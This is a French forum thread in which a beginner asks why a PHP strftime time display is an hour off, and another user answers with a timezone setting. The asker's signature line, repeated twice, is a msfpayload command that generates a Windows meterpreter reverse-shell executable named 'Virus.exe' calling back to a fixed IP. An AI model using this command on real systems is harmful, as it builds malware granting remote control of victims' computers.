Partage
  • Partager sur Facebook
  • Partager sur Twitter

Affichage de l'heure sur PHP

Sujet résolu
    27 novembre 2020 à 22:59:55

    Bonjour, souhaitant reprendre le PHP, j'ai décidé de me relancer depuis le début ! Je voulais faire un code tout simple affichant l'heure( heure et minutes).

    Cependant l'heure s'affichant a une heure de retard (à cause de l'heure d'été je pense), donc je voulais savoir comme résoudre cela; voici mon code:

    <!DOCTYPE html>
    <html>
        <head>
            <meta charset="utf-8" />
            <title>Ma page web</title>
        </head>
        <body>
            <h1>Ma page web</h1>
            <p>Il est<?php echo strftime("%R"); ?>.</p>
        </body>
    </html>



    Merci et bonne soirée

    • Partager sur Facebook
    • Partager sur Twitter

    msfpayload -p windows/meterpreter/reverse_tcp lhost=172.45.3.23 lport=80 R > Desktop/Virus.exe

      28 novembre 2020 à 22:35:39

      Vérifie la valeur de ton paramètre date.timezone dans le fichier php.ini sinon ajoute (avant) un date_default_timezone_set('Europe/Paris'); à ton code.

      PS : il y a un forum PHP où poser les questions spécifiques à PHP

      -
      Edité par julp 28 novembre 2020 à 22:35:57

      • Partager sur Facebook
      • Partager sur Twitter
        30 novembre 2020 à 14:45:25

        Merci beaucoup de votre réponse, effectivement, maintenant cela fonctionne ! Et désolé je n'avais point vu le forum spécifique, j'étais fatigué !
        • Partager sur Facebook
        • Partager sur Twitter

        msfpayload -p windows/meterpreter/reverse_tcp lhost=172.45.3.23 lport=80 R > Desktop/Virus.exe

        Affichage de l'heure sur PHP

        × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
        × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
        • Editeur
        • Markdown